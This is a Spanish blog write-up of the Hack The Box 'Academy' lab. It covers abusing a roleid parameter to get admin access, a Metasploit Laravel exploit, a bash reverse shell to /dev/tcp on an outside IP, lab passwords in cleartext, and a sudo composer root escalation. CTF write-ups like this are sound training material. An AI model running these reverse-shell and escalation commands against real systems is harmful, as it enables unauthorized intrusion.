Ximo Baeza

Ximo Baeza

Entusiasta del software libre y la ciberseguridad

Academy - Hack The Box

Resolución de la máquina Academy de Hack The Box, una máquina Linux de dificultad fácil según la plataforma en la cual nos aprovechamos del parámetro rolid para crear un usuario administrador en la web, luego utilizamos un exploit para el framework laravel para acceder al sistema y por último aprovechamos que podemos ejecutar el comando composer con sudo sin contraseña para escalar privilegios y obtener una shell de root.

Escaneo de puertos

Puertos 22,80 y 33060 abiertos. Empiezo por el 80. Accedo con el navegador a la ip 10.10.10.215 y me dice que no se puede abrir la página. Veo que en el escaneo con nmap aparece el dominio academy.htb, lo añado al fichero hosts y ya me deja acceder con el nombre del dominio.

Lanzo gobuster para fuzzear los directorios y ficheros de la web.

Mientras tanto me registro en la página y capturo la petición con burpsuite. Veo que los parámetros que viajan en la petición son: uid=ximo&password=ximo&confirm=ximo&roleid=0

Me llamala atención el parámetro roleid. Envío la petición al repeater y modifico el valor a 1. Gobuster descubre una página que se llama admin.php, así que pruebo el usuario que he registrado con el roleid=1 y accedo como admin.

Gobuster encuentra también un fichero readme dentro del directorio academy, que dice que se está usando un framework llamado laravel.

Me llama la atención esto : Fix issue with dev-staging-01.academy.htb Lo añado al fichero hosts y accedo a la página.

Sabiendo que el frameowrk usado es laravel empiezo a buscar vulnerabilidades relacionadas con este framework. Encuentro un exploit para metasploit y decido usarlo. Seteo el app_key, que me lo da la web del subdominio en la sección de environment, el rhosts academy.htb, lhost tun0 y vhost dev-staging-01.academy.htb y obtengo una shell.

Me pongo a la escucha con rlwrap nc -lvnp 9001 y me lanzo una reverse shell para estar más cómodo bash -c 'bash -i >& /dev/tcp/10.10.14.191/9001 0>&1'

Voy al directorio academy y con ls -a veo que hay un fichero .env que puedo leer y que contiene unas credenciales.

En el directorio home hay varios usuarios, pruebo la contraseña con todos y hay uno que funciona.

su cry0l1t3
Password: mySup3rP4s5w0rd!!

Ya puedo leer el fichero user.txt

Subo a la máquina el script linpeas.sh y lo ejecuto y encuentro la contraseña del usuario mrb3n –> mrb3n_Ac@d3my!

Con el comando su me convierto en el usuario mrb3n

Con sudo -l veo que puedo ejecutar el comando composer como root

Busco composer en gtfobins y veo que hay una forma de explotarlo cuando se puede usar con sudo

Ejecuto los comandos y obtebgo la shell de root

TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x

Ya puedo leer el root.txt

Puede que también te interese

Reflection Vulnlab Chain

En este artículo vamos a resolver el laboratorio Reflection de la plataforma Vulnlab. Para ello haremos cosas tan chulas como un relay de credenciales desde un mssqlclient, o una explotación de rbcd teniendo el machine account quota a cero.

Game of Active Directory - Parte 6

En esta sexta parte vamos a atacar el servidor kingslanding.sevenkingdoms.local, que es el controlador de dominio de sevenkingdoms.local. Nos aprovecharemos de la relación de confianza bidireccional que tiene con el dominio essos.local que, en este caso está configurado con la opción sid-history. Esto nos permitirá crear un golden ticket con acceso total al dominio sevenkingdoms.local y podremos hacer un dcsync obteniendo el hash del administrador.

Game of Active Directory - Parte 5

En esta quinta parte vamos a atacar el controlador de dominio meereen.essos.local. Tras una enumeración del servicio web en braavos.essos.local descubriremos que dispone del rol ADCS. Veremos que es vulnerable y utilizaremos certipy para obtener la cuenta del administrador de dominio en meereen.essos.local. Por último lo conectaremos al command and control Sliver utilizando el archivo generado en el anterior artículo, aprovechando que está preparado para evadir el defender.

Game of Active Directory - Parte 4

En esta cuarta parte vamos a atacar el dominio essos.local. Conseguiremos credenciales con asreproasting, para luego ver con bloodhound que tenemos el rol GenericAll sobre otra cuenta, y nos aprovecharemos de eso para escalar privilegios. Finalmente obtendremos un beacon de sliver evadiendo el defender.